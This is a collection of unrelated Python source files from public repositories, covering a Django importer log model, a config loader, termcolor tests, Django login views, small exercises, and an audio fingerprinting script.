_(LogStatus.FAILED)),\n (LogStatus.SUCCESS, _(LogStatus.SUCCESS)),\n ),\n default=LogStatus.START\n )\n note = models.TextField(blank=True, null=True)\n\n class Meta: # noqa: D106\n ordering = ('-start_time',)\n\n def send_alert(self):\n \"\"\"Send alert.\"\"\"\n from geosight.importer.models.importer import ImporterAlert\n pref = SitePreferences.preferences()\n if not self.importer.job:\n return\n\n emails = []\n if self.importer.creator.email:\n emails.append(self.importer.creator.email)\n if self.status == LogStatus.START:\n emails.extend(\n ImporterAlert.objects.filter(\n importer=self.importer,\n on_start=True\n ).values_list('email', flat=True)\n )\n elif self.status == LogStatus.FAILED:\n emails.extend(\n ImporterAlert.objects.filter(\n importer=self.importer,\n on_failure=True\n ).values_list('email', flat=True)\n )\n elif self.status == LogStatus.SUCCESS:\n emails.extend(\n ImporterAlert.objects.filter(\n importer=self.importer,\n on_success=True\n ).values_list('email', flat=True)\n )\n\n # Send email\n if emails:\n log_url = reverse(\"admin-importer-log-detail-view\", args=[self.pk])\n try:\n status = self.status\n if status == LogStatus.START:\n status = 'Started'\n context = {\n 'name': self.importer.__str__(),\n 'status': status.lower(),\n 'url': f'{pref.site_url}{log_url}'\n }\n\n message = render_to_string(\n 'emails/log_notification.html',\n context\n )\n send_mail(\n f'Importer \"{self.importer.__str__()}\" is {status}',\n None,\n settings.DEFAULT_FROM_EMAIL,\n list(emails),\n html_message=message,\n fail_silently=True,\n )\n except Exception:\n pass\n\n\nclass ImporterLogData(models.Model):\n \"\"\"Data that is found on the importer.\n\n It will also be used for review one.\n When imported, delete the data.\n \"\"\"\n\n log = models.ForeignKey(ImporterLog, on_delete=models.CASCADE)\n data = models.JSONField()\n note = models.JSONField(null=True)\n saved = models.BooleanField(\n default=False, help_text=\"Is the data saved to actual model.\"\n )\n\n @property\n def status(self):\n \"\"\"Return status.\"\"\"\n in_warning = False\n if self.note:\n note_keys = list(self.note.keys())\n try:\n 
note_keys.remove('warning')\n if not len(note_keys):\n in_warning = True\n except ValueError:\n pass\n\n if self.saved:\n return 'Saved'\n elif in_warning:\n return 'Warning'\n elif self.note and self.note.keys():\n return 'Error'\n return 'Review'\n\n\nclass ImporterLogDataSaveProgress(models.Model):\n \"\"\"Progress on saving data.\"\"\"\n\n log = models.ForeignKey(ImporterLog, on_delete=models.CASCADE)\n target_ids = models.JSONField()\n saved_ids = models.JSONField(default=list)\n note = models.JSONField(null=True)\n done = models.BooleanField(default=False)\n\n def run(self):\n \"\"\"Run the log.\"\"\"\n log_datas = self.log.importerlogdata_set.filter(\n id__in=self.target_ids\n )\n importer = self.log.importer.importer(self.log)\n for log_data in log_datas:\n importer._save_log_data_to_model(log_data)\n self.saved_ids.append(log_data.id)\n self.save()\n self.delete()\n","repo_name":"unicef-drp/GeoSight-OS","sub_path":"django_project/geosight/importer/models/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"36841534908","text":"\nfrom pysmt.shortcuts import Solver\nfrom tarski.theories import has_theory\nfrom tarski.syntax.ops import compute_sort_id_assignment\n\n\nclass SMTTranslator:\n def __init__(self, smtlang, static_symbols, action_names):\n self.smtlang = smtlang\n self.static_symbols = static_symbols\n self.action_names = action_names\n\n assert has_theory(smtlang, \"arithmetic\")\n\n # Compute a sort-contiguous object ID assignment\n self.sort_bounds, self.object_ids = compute_sort_id_assignment(self.smtlang)\n\n\ndef solve(theory, solver_name):\n \"\"\" \"\"\"\n # with tempfile.NamedTemporaryFile(mode='w+t', delete=False) as f:\n # for t in theory:\n # print(t, file=f)\n # print(f'Theory printed on file {f.name}')\n\n # with Solver(logic=\"UFIDL\") as solver:\n with Solver(name=solver_name) as solver:\n # is_sat = solver.is_sat(And(theory)) # Alternatively\n\n print(f'Using solver \"{solver_name}\" configured with logic {solver.logic}')\n\n for sentence in theory:\n solver.add_assertion(sentence)\n\n solvable = solver.solve()\n if not solvable:\n return None\n\n return solver.get_model()\n","repo_name":"aig-upf/fstripssmt","sub_path":"src/fstripssmt/solvers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"42469531393","text":"import durationpy\nimport validators\nimport yaml\n\n\nclass Config(object):\n def __init__(self, path):\n with open(path, \"r\") as f:\n try:\n loader = yaml.FullLoader\n except AttributeError:\n loader = yaml.Loader\n data = yaml.load(f, Loader=loader)\n self.services = dict([(k, ServiceConfig(k, **v)) for k, v in data['services'].items()])\n self.shims = dict([(k, ShimConfig(k, **v)) for k, v in data['shims'].items()])\n\n def service(self, name='default'):\n return self.services[name]\n\n def shim(self, name='default'):\n return self.shims[name]\n\n\nclass ServiceConfig(object):\n def __init__(self, name, **kwargs):\n if not name:\n raise Exception('missing name')\n\n self.name = name\n\n def set_str(k, v):\n self.__dict__[k] = str(v)\n\n def set_url(k, v):\n v = str(v)\n if not validators.url(v):\n raise ValueError('%s service config has invalid url: %s' % (name, v))\n self.__dict__[k] = v\n\n def set_duration(k, v):\n v = str(v)\n try:\n # d is a datetime.timedelta\n d = 
durationpy.from_str(v)\n except Exception:\n raise ValueError('%s service config has invalid duration: %s' % (name, v))\n self.__dict__[k] = d\n\n setters = {\n 'command': set_str,\n 'command_args': set_str,\n 'stop_command': set_str,\n 'base_url': set_url,\n 'init_url': set_url,\n 'init_timeout': set_duration,\n }\n\n for k, v in kwargs.items():\n setter = setters.get(k)\n if not setter:\n raise KeyError('%s service config has unknown property: %s' % (name, k))\n setter(k, v)\n\n for k in ('command', 'base_url'):\n if k not in self.__dict__:\n raise Exception('%s service config is missing required property: %s' % (name, k))\n\n\nclass ShimConfig(object):\n def __init__(self, name, **kwargs):\n if not name:\n raise AttributeError('missing name')\n\n self.name = name\n\n def set_str(k, v):\n self.__dict__[k] = str(v)\n\n setters = {\n 'path': set_str,\n 'trace': set_str\n }\n\n for k, v in kwargs.items():\n setter = setters.get(k)\n if not setter:\n raise KeyError('%s shim config has unknown property: %s' % (name, k))\n setter(k, v)\n","repo_name":"Spirent/openperf","sub_path":"tests/aat/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"92"} +{"seq_id":"42503347551","text":"number = int(input())\nsum_1 = 0\nsum_2 = 0\nmax_diff = 0\nfor i in range(number):\n first = int(input())\n second = int(input())\n if i == 0:\n sum_1 = first + second\n if i % 2 == 0:\n sum_1 = first + second\n else:\n sum_2 = first + second\n if sum_1 > sum_2 and i != 0:\n max_diff = sum_1 - sum_2\n elif sum_2 > sum_1 and i != 0:\n max_diff = sum_2 - sum_1\nif max_diff == 0:\n print(f\"Yes, value={sum_1}\")\nelse:\n print(f\"No, maxdiff={abs(max_diff)}\")\n","repo_name":"IvaVangelova/SoftUni-Python-Basic","sub_path":"15_more_exercises/05_for_loop/08_equal_pairs.py","file_name":"08_equal_pairs.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"26488970478","text":"TAILLE_PLATEAU = 5\nBOARD_ONE = 1\nBOARD_TWO = 2\n\n\nclass BOARD:\n def __init__(self):\n self.__board_P1 = []\n self.__board_P2 = []\n \n self.__board_v_p1 = []\n self.__board_v_p2 = []\n \n \n def build_board(self, B):\n for i in range(TAILLE_PLATEAU):\n elem = []\n for j in range(TAILLE_PLATEAU):\n elem.append(0)\n if B == 1:\n self.__board_P1.append(elem)\n elif B == 2:\n self.__board_P2.append(elem)\n elif B == 3:\n self.__board_v_p1.append(elem)\n else:\n self.__board_v_p2.append(elem)\n \n if B == 1:\n return self.__board_P1\n elif B == 2:\n return self.__board_P2\n elif B == 3:\n return self.__board_v_p1\n else:\n return self.__board_v_p2\n \n def affiche_board_p1(self):\n print(\" \" + \" -\"*TAILLE_PLATEAU + \" \" + \" -\"*TAILLE_PLATEAU)\n for i in range(TAILLE_PLATEAU):\n print(\" | \", end=\"\")\n for j in range(TAILLE_PLATEAU):\n char = self.affiche_place((i, j), BOARD_ONE)\n print(char, end=\" \")\n self.affiche_board_p2(i, BOARD_TWO)\n \n def affiche_board_p2(self, i, BOARD_TWO):\n print(\"| \",end=\"\")\n for j in range(TAILLE_PLATEAU):\n char = self.affiche_place((i, j), BOARD_TWO)\n print(char, end=\" \")\n print(\"| \")\n if j == TAILLE_PLATEAU - 1 and i == TAILLE_PLATEAU - 1:\n print(\" \" + \" -\"*TAILLE_PLATEAU + \" \" + \" -\"*TAILLE_PLATEAU)\n print(\" \"*TAILLE_PLATEAU + \" p1 \" + \" \"*2*TAILLE_PLATEAU + \"p2\")\n \n def affiche_place(self, place, board):\n if board == 1:\n return 
self.__board_P1[place[0]][place[1]]\n else:\n return self.__board_P2[place[0]][place[1]]\n \n def set_board(self, place, modif, board):\n if board == 1:\n self.__board_P1[place[0]][place[1]] = modif\n else:\n self.__board_P2[place[0]][place[1]] = modif\n \n def taille_p(self):\n #print(\"%%%%\",len(self.__board_P1))\n return len(self.__board_P1)\n \nif __name__ == \"__main__\":\n B = BOARD()\n B.build_board(1)\n B.build_board(2)\n B.affiche_board_p1()","repo_name":"Atra0003/bataille_navalle","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4720710452","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\n\nfood = list(map(int, input().split()))\n\nd = [0]*100\n\nd[0] = food[0]\nd[1] = max(food[0],food[1])\n\nfor i in range(2,n):\n d[i] = max(d[i-2]+food[i], d[i-1])\n\n\nprint(d[n-1])","repo_name":"inistory/daily_coding","sub_path":"이것이코딩테스트다/5. DP/개미전사/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"11224603211","text":"from more_termcolor import convert, core\nfrom more_termcolor.tests import common\nimport re\nfrom itertools import permutations\n\n\ndef test__to_code__sanity():\n for color, code in core.FORMATTING_COLOR_CODES.items():\n assert convert.to_code(color) == code\n \n for color, code in core.FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(color) == code\n \n for color, code in core.BRIGHT_FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(f'bright {color}') == code\n \n for color, code in core.BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on {color}') == code\n \n for color, code in core.RESET_COLOR_CODES.items():\n assert convert.to_code(f'reset {color}') == code\n \n for color, code in core.BRIGHT_BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on bright {color}') == code\n\n\ndef test__to_code__from_code():\n for color, code in core.FORMATTING_COLOR_CODES.items():\n assert convert.to_code(color) == convert.to_code(code)\n \n for color, code in core.FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(color) == convert.to_code(code)\n \n for color, code in core.BRIGHT_FOREGROUND_COLOR_CODES.items():\n assert convert.to_code(f'bright {color}') == convert.to_code(code)\n \n for color, code in core.STANDARD_BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on {color}') == convert.to_code(code)\n \n for color, code in core.RESET_COLOR_CODES.items():\n assert convert.to_code(f'reset {color}') == convert.to_code(code)\n \n for color, code in core.BRIGHT_BACKGROUND_COLOR_CODES.items():\n assert convert.to_code(f'on bright {color}') == convert.to_code(code)\n\n\ndef test__to_code__edge_cases():\n with common.assert_raises(KeyError, 'grin'):\n convert.to_code('grin')\n with common.assert_raises(KeyError, 'brightblue'):\n convert.to_code('brightblue')\n with common.assert_raises(KeyError, 'brightblue'):\n convert.to_code('on brightblue')\n\n\ndef test__to_code__docstring_examples():\n assert convert.to_code('green') == '32'\n assert convert.to_code('on red') == '41'\n assert convert.to_code('on bright yellow') == '103'\n assert convert.to_code(32) == '32' == convert.to_code('32')\n\n\n@common.print_and_compare\ndef test__to_color__sanity():\n for color, code in core.FORMATTING_COLOR_CODES.items():\n actual = convert.to_name(code)\n 
try:\n yield actual, color\n except AssertionError as e:\n print()\n # aliases\n if (actual, color) not in (\n ('ita', 'italic'),\n ('ul', 'underline'),\n ('conceal', 'concealed'),\n ('ol', 'overline'),\n ):\n raise\n \n for color, code in core.FOREGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n try:\n yield actual, color\n except AssertionError as e:\n if (actual, color) != ('black', 'grey'):\n raise\n \n for color, code in core.BRIGHT_FOREGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'bright {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n if (actual, expected) != ('bright black', 'bright grey'):\n raise\n \n for color, code in core.STANDARD_BACKGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'on {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n if (actual, expected) != ('on black', 'on grey'):\n raise\n \n for color, code in core.BRIGHT_BACKGROUND_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'on bright {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n if (actual, expected) != ('on bright black', 'on bright grey'):\n raise\n \n for color, code in core.RESET_COLOR_CODES.items():\n actual = convert.to_name(code)\n expected = f'reset {color}'\n try:\n yield actual, expected\n except AssertionError as e:\n # same reset codes, different colors (or aliases)\n if (actual, expected) not in ((f'reset {pair[0]}', f'reset {pair[1]}') for pair in (\n ('bold', 'dark'),\n ('ita', 'italic'),\n ('ul', 'underline'),\n ('ul', 'doubleul'),\n ('blink', 'fastblink'),\n ('conceal', 'concealed'),\n ('frame', 'circle'),\n ('ol', 'overline'),\n )):\n raise\n\n\ndef test__to_color__docstring_examples():\n assert convert.to_name(32) == 'green' == convert.to_name('32')\n assert convert.to_name(41) == 'on red' == convert.to_name('41')\n assert convert.to_name(103) == 'on bright yellow' == convert.to_name('103')\n assert convert.to_name('green') == 'green'\n\n\n@common.print_and_compare\ndef test__to_code__fonts():\n actual = convert.to_code('10')\n expected = '10'\n return actual, expected\n\n\ndef test__to_reset_code__valid_values():\n assert convert.to_reset_code('1') == '22'\n assert convert.to_reset_code('reset 1') == '22'\n assert convert.to_reset_code('bold') == '22'\n assert convert.to_reset_code('dark') == '22'\n assert convert.to_reset_code(22) == '22' == convert.to_reset_code('22')\n assert convert.to_reset_code('green') == '39' == core.RESET_COLOR_CODES['fg']\n assert convert.to_reset_code('reset green') == '39' == core.RESET_COLOR_CODES['fg']\n assert convert.to_reset_code('on red') == '49'\n assert convert.to_reset_code('reset on red') == '49'\n assert convert.to_reset_code('bright red') == '39'\n assert convert.to_reset_code('reset bright red') == '39'\n assert convert.to_reset_code('on bright yellow') == '49'\n assert convert.to_reset_code('reset on bright yellow') == '49'\n assert convert.to_reset_code('on') == '49'\n assert convert.to_reset_code('reset on') == '49'\n\n\ndef test__to_reset_code__bad_values():\n for bad in ('BAD', 'on BAD', 'on bright BAD'):\n with common.assert_raises(KeyError, f\"to_reset_code('{bad}'): color '{bad}' isn't recognized\"):\n # convert.to_reset_code(bad, trace_call=bad != 'BAD')\n convert.to_reset_code(bad)\n \n with common.assert_raises(KeyError, 'bright'):\n convert.to_reset_code('bright')\n \n with common.assert_raises(KeyError):\n convert.to_reset_code('on bright dark')\n convert.to_reset_code('on 
dark')\n convert.to_reset_code('on bright all')\n\n\n@common.print_and_compare\ndef test__to_boundary():\n for code in (1, '1', 'bold'):\n actual = convert.to_boundary(code)\n expected = '\\x1b[1m'\n yield actual, expected\n \n actual = convert.to_boundary(1, '2', 'on bright black')\n # expected = re.compile(common.codes_perm(1, 2, 100))\n expected = \"\\x1b[1;2;100m\"\n yield actual, expected\n","repo_name":"giladbarnea/more_termcolor","sub_path":"more_termcolor/tests/test__convert.py","file_name":"test__convert.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"2574483119","text":"import pandas as pd \n\npath_landmarks = \"../data/Illinois/Info/summary_lm.csv\"\npath_machine_guess = \"../transfer_learning/machine_guess.csv\"\npath_wiki_info = \"../data/Illinois/Illinois_wiki.csv\"\n\n# By Cooper Nederhood (original)\n\ndef create_template(path_landmarks, path_machine_guess, output_filename, path_wiki_info = None):\n\t'''\n\tData relevant for the quiz template resides in 2 locations, possible 3 \n\tdepending on how the wiki data was pulled. Gather this information and\n\tprepare in format easiest to incorporate into Django. Save as csv (pipe delimited)\n\n\tInputs:\n\t\t- path_landmarks: (str) path to landmark 'summary_lm.csv'\n\t\t- path_machine_guess: (str) path to ML alogrithm guess\n\t\t- output_filename: (str) name of output file\n\t\t- path_wiki_info: (str) if wiki data added after, path to wiki info\n\n\t'''\n\n\tneed_wiki = path_wiki_info != None\n\n\tif need_wiki == True:\n\t\tdf_landmarks = pd.read_csv(path_landmarks, delimiter=\"|\", usecols=['id', 'name', 'test_image_url'])\n\t\tdf_wiki = pd.read_csv(path_wiki_info, delimiter=\"|\")\n\telse:\n\t\tdf_landmarks = pd.read_csv(path_landmarks, delimiter=\"|\", usecols=['id', 'name', 'test_image_url', 'wiki_url', 'wiki_summary'])\n\n\tdf_machine = pd.read_csv(path_machine_guess)\n\n\tmerge_df = df_landmarks.merge(df_machine, on='id', how='outer')\n\tif need_wiki == True:\n\t\tmerge_df = merge_df.merge(df_wiki, on='id', how='outer')\n\n\t# decode the machine guess by merging on the landmark file\n\tmerge_df.rename( columns={\"id\":'num_id', \"name\": \"name_landmark\", \"machine_guess\":\"id\"}, inplace = True)\n\tmerge_df = merge_df.merge(df_landmarks[['id', 'name']], on='id', how='outer')\n\tmerge_df.rename( columns={\"id\":'num_id', \"name\": \"machine_guess_name\", \"id\":\"machine_guess\"}, inplace = True)\n\n\tmerge_df['num_id'] = merge_df['num_id'].str.replace(\"lm\", \"\")\n\tmerge_df['num_id'] = pd.to_numeric(merge_df['num_id'], errors='coerce') \n\n\tmerge_df['machine_guess'] = merge_df['machine_guess'].str.replace(\"lm\", \"\")\n\tmerge_df['machine_guess'] = pd.to_numeric(merge_df['machine_guess'], errors='coerce') \n\n\torder = ['num_id', 'name_landmark', 'machine_guess', 'machine_guess_name', 'score', 'test_image_url', 'wiki_url', 'wiki_summary']\n\tmerge_df = merge_df[order]\n\tmerge_df.sort_values('num_id', inplace=True)\n\n\n\tmerge_df = merge_df[ pd.isnull(merge_df.num_id) == False]\n\n\n\tmerge_df.to_csv(output_filename, sep=\"|\", index=False)\n\n\treturn merge_df, df_landmarks, df_machine, df_wiki\n\nmerge_df, df_landmarks, df_machine, df_wiki = create_template(path_landmarks, path_machine_guess, \"template.csv\", 
path_wiki_info)\n","repo_name":"w4rner/IMAGEine","sub_path":"django_shell/get_csv_info.py","file_name":"get_csv_info.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36915762771","text":"import random\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom roles.models import Homonym, AgentNoun\n\n\nlevels = [\n 'senior',\n 'junior',\n 'rockstar',\n 'acting',\n 'lead',\n 'quantitative',\n 'full stack',\n]\n\n\ndef home(request):\n level = request.GET.get('level', random.choice(levels))\n\n agent_noun = request.GET.get('agent_noun', AgentNoun.objects.raw('''\n select * from {0} limit 1\n offset floor(random() * (select count(*) from {0}))\n '''.format(AgentNoun._meta.db_table))[0].word)\n\n homonym = request.GET.get('noun', Homonym.objects.raw('''\n select * from {0} limit 1\n offset floor(random() * (select count(*) from {0}))\n '''.format(Homonym._meta.db_table))[0].word)\n\n context = {\n 'level': level,\n 'agent_noun': agent_noun,\n 'noun': homonym\n }\n\n if request.is_ajax():\n return JsonResponse(context)\n\n return render(request, 'home.html', context=context)\n","repo_name":"Joeboy/yournextrole","sub_path":"roles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31764872931","text":"from django.shortcuts import render, render_to_response,redirect\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\nfrom django.template import RequestContext\nfrom django.http import HttpResponse\nfrom mongoengine import *\n#from django.contrib.auth import authenticate\nfrom mongoengine.django.auth import User, Permission\nfrom django.contrib import messages\n\n\nfrom .models import Usuario\nfrom corpus.models import *\nfrom archivos.models import *\n\ndef test(request):\n \n tag = '5591ead23d878a0556ce9d02'\n a = Anidados.objects(corpus='5591eb2a3d878a0556ce9e02')\n b = Anidados.objects(tags__Estrato='N')\n c = Anidados.objects(tags__Descripción__contains='de')\n d = Anidados.objects(ref=tag,tags__Descripción__contains='Bogotá')\n e = Anidados.objects(ref=tag)\n print(len(e))\n print(len(d))\n #for an in c:\n #print(an.tags['Descripción'])\n #print('--------------------------')\n print('**************************************************************')\n for an in d:\n print(an.tags['Descripción'])\n print('--------------------------')\n print('sirve')\n\n return redirect('index')\n\n\ndef login(request):\n from django.contrib.auth import login\n from mongoengine.django.auth import User\n from mongoengine.queryset import DoesNotExist\n from django.contrib import messages\n \n \n if request.user.is_authenticated():\n return redirect('index')\n \n try:\n usuario = request.POST.get('user',False)\n pswd = request.POST.get('password',False)\n user = Usuario.objects.get(username=usuario)#request.POST['username'])\n print(user)\n if user.check_password(pswd):#request.POST['password']):\n user.backend = 'mongoengine.django.auth.MongoEngineBackend'\n request.session.set_expiry(60 * 60 * 1) # 1 hour timeout\n print(login(request, user))\n return redirect('index')\n else:\n messages.add_message(request,messages.ERROR,u\"¡Password incorrecto! Por favor introduzca el password correcto\")\n\n except DoesNotExist:\n messages.add_message(request,messages.ERROR,u\"¡El usuario no existe! 
Por favor intente con otro\")\n\n template = 'login/index.html'\n return render_to_response(template,{},context_instance=RequestContext(request))\n\ndef logout(request):#NOT TESTED\n from django.contrib.auth import logout\n logout(request)\n \n template = 'login/index.html'\n return render_to_response(template,{},context_instance=RequestContext(request))\n\ndef init(request):\n user = Usuario.create_user('admin','admin','admin@admin.gov')\n user.perm = ['admin']\n user.save()\n return redirect('/')\n\ndef index(request):\n if request.user.is_authenticated():\n return redirect('index')\n template = 'login/index.html'\n return render_to_response(template,{},context_instance=RequestContext(request))\n\ndef create(request):\n if not request.user.is_authenticated():\n return redirect('index')\n \n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))\n\ndef delete_user(request):\n \n usuario = request.POST.get('id_user',False)\n user = Usuario.objects.get(username=usuario)#request.POST['username'])\n user.delete()\n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))\n\n\n\ndef create_user(request):\n if not request.user.is_authenticated():\n return redirect('index')\n \n usuario = request.POST.get('user',False)\n email = request.POST.get('email',False)\n pswd = request.POST.get('password',False)\n pswd_c = request.POST.get('c_password',False)\n\n import re\n\n if not pswd == pswd_c:\n messages.add_message(request, messages.INFO, 'Contraseñas no coinciden')\n if pswd == '':\n messages.add_message(request, messages.INFO, 'La contraseña no puede ser vacia')\n if usuario == '':\n messages.add_message(request, messages.INFO, 'El usuario no puede ser vacio')\n if email == '':\n messages.add_message(request, messages.INFO, 'El correo no puede ser vacio')\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n messages.add_message(request, messages.INFO, 'El correo no tiene un formato válido')\n\n if len(messages.get_messages(request)) > 0:\n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))\n user = Usuario.create_user(usuario,pswd,email)\n\n if request.POST.get('archivo',False) is not False:\n user.perm = ['admin']\n user.save()\n\n template = 'login/create.html'\n return render_to_response(template,{'usu':Usuario.objects()},context_instance=RequestContext(request))","repo_name":"drumsoverbogota/metadatos","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7077069674","text":"from enum import Enum\n\nclass PracticeType(Enum):\n pilot = \"Pair Programming being Pilot\",\n copilot = \"Pair Programming being Co-pilot\",\n reviewer = \"Code Review being Reviewer\",\n author = \"Code Review being Author\",\n planning = \"Scrum Planning Meeting\",\n daily = \"Scrum Daily Meeting\",\n review = \"Scrum Review Meeting\",\n retrospective = \"Scrum Retrospective Meeting\",\n design = \"Design Meeting\",\n\nPracticeQuestion = {\n \"pilot\": \" da atividade de programação em pares como piloto.\",\n \"copilot\": \" da atividade de programação em pares como co-piloto.\",\n \"reviewer\": \" da atividade de revisão de código como revisor.\",\n \"author\": \" da atividade de revisão de código como autor.\",\n \"planning\": 
\" da reunião Planning\",\n \"daily\": \" da reunião Daily\",\n \"review\": \" da reunião Review\",\n \"retrospective\": \" da reunião Retrospective\",\n \"design\": \" de reuniões de discussão de design.\",\n}\nFeelingTranslate = {\n \"confort\": \"Conforto\",\n \"pleasure\": \"Prazer\",\n \"respected\": \"Respeitado\",\n \"safe\": \"Seguro\",\n \"tiring\": \"Cansado\"\n}\n\nFeelingQuestion = {\n \"confort\": \"Sinto confortável ao participar\",\n \"pleasure\": \"Tenho prazer em participar\",\n \"respected\": \"Sinto respeitado pelos meus colegas ao participar\",\n \"safe\": \"Sinto seguro ao participar\",\n \"tiring\": \"Considero cansativo participar\"\n}\n\nexpertiseValue = {\n 1: \"None\",\n 2: \"Small\",\n 3: \"Some\",\n 4: \"High\",\n 5: \"Expert\"\n}\n\nlinkertValue = {\n \"Concordo fortemente\": 7,\n \"Concordo\": 6,\n \"Concordo fracamente\": 5,\n \"Neutro\": 4,\n \"Discordo fracamente\": 3,\n \"Discordo\": 2,\n \"Discordo fortemente\": 1\n}\n\nclass AgilePractice:\n def __init__(self, practiceType, answers):\n self.type = practiceType\n self.answers = answers\n self.expertise = answers[0]\n self.confort = linkertValue[answers[1]]\n self.pleasure = linkertValue[answers[2]]\n self.tiring = linkertValue[answers[3]]\n self.respected = linkertValue[answers[4]]\n self.safe = linkertValue[answers[5]]\n\n def __getitem__(self, key):\n return getattr(self, key)\n \n def __setitem__(self, key, value):\n return setattr(self, key, value)","repo_name":"pri-cavalli/SurveyDataAnalyze","sub_path":"AgilePractice.py","file_name":"AgilePractice.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15393858346","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 25 22:27:25 2021\r\n\r\n@author: duwat\r\n\"\"\"\r\n\r\n\r\nimport os\r\nimport warnings\r\nimport librosa\r\nimport numpy as np\r\nfrom scipy import ndimage as ndi\r\nimport random\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nfrom functions import get_filename\r\nfrom functions import FingerPrint_Database\r\nfrom functions import peak_local_max\r\nfrom functions import matching_pairs\r\nfrom functions import hashPeaks\r\nfrom functions import best_match\r\nfrom recording import recording\r\n\r\nos.chdir('C:/Users/duwat/Desktop/projet shazam/Album')\r\n# Song database\r\nsong_database = get_filename('C:/Users/duwat/Desktop/projet shazam/Album')\r\n\r\ndef show_database():\r\n print( 'Les musiques contenues dans la database sont :')\r\n index = 1\r\n for i in song_database:\r\n print(index, '- ' + i[:-4])\r\n index = index+1\r\n \r\n return \r\n\r\n\r\nF_database=FingerPrint_Database(song_database)\r\n\r\n\r\ndef shazam(sample):\r\n \r\n print('Shazam tente de retrouver votre titre ...')\r\n \r\n sample_16k = librosa.resample(sample, 44100, 16000)\r\n sample_stft = librosa.stft(sample, n_fft=2048)\r\n sample_stft_dB = librosa.amplitude_to_db(np.abs(sample_stft),ref=np.max) \r\n \r\n threshold = np.amin(sample_stft_dB) * (50/100)\r\n \r\n image_max = ndi.maximum_filter(sample_stft_dB, size=5, mode='constant')\r\n peaks = peak_local_max(sample_stft_dB, min_distance=30,threshold_abs=threshold)\r\n \r\n \r\n # Extract the fingerprint of the unknown audio\r\n sample_fingerprint = hashPeaks(peaks,0)\r\n \r\n \r\n # Find the matching pairs between sample audio file and the songs in the database\r\n matchingPairs = matching_pairs(F_database, sample_fingerprint)\r\n \r\n \r\n # Identify the song\r\n songbins,offsets = 
best_match(song_database,matchingPairs)\r\n print('Le titre de votre chanson est: '+ song_database[np.argmax(songbins)][:-4], 'une chanson du premier album de The Courthills')\r\n \r\n \r\n\r\n\r\ndef shazam_auto():\r\n \r\n recording()\r\n \r\n sample,sr = librosa.load('Record.wav', sr=44100)\r\n \r\n shazam(sample)\r\n\r\n\r\n\r\n\r\n \r\ndef shazam_manuel(song, bruit, durée , départ):\r\n \r\n x,sr = librosa.load(str(song)+'.wav',sr=44100)\r\n \r\n sam=[]\r\n \r\n r=départ*sr\r\n dur= int(sr*durée)\r\n for i in range (dur):\r\n \r\n b=random.uniform(-bruit, bruit)\r\n sam.append(x[r+i] + b)\r\n \r\n \r\n \r\n y = np.array(sam)\r\n sample = y.astype(np.float64)\r\n \r\n sample = 0.99 * sample / max(abs(sample))\r\n shazam(sample)\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\ndef shazam_manuel_famtom(song, bruit, durée , départ):\r\n \r\n x,sr = librosa.load(str(song)+'.wav',sr=44100)\r\n \r\n sam=[]\r\n print(len(x))\r\n r=départ*sr\r\n dur= int(sr*durée)\r\n for i in range (dur):\r\n \r\n# b=random.uniform(-bruit, bruit)\r\n sam.append(x[r+i])\r\n \r\n \r\n \r\n y = np.array(sam)\r\n sample = y.astype(np.float64)\r\n \r\n sample = 0.99 * sample / max(abs(sample))\r\n sample_16k = librosa.resample(sample, 44100, 16000)\r\n sample_stft = librosa.stft(sample, n_fft=2048)\r\n 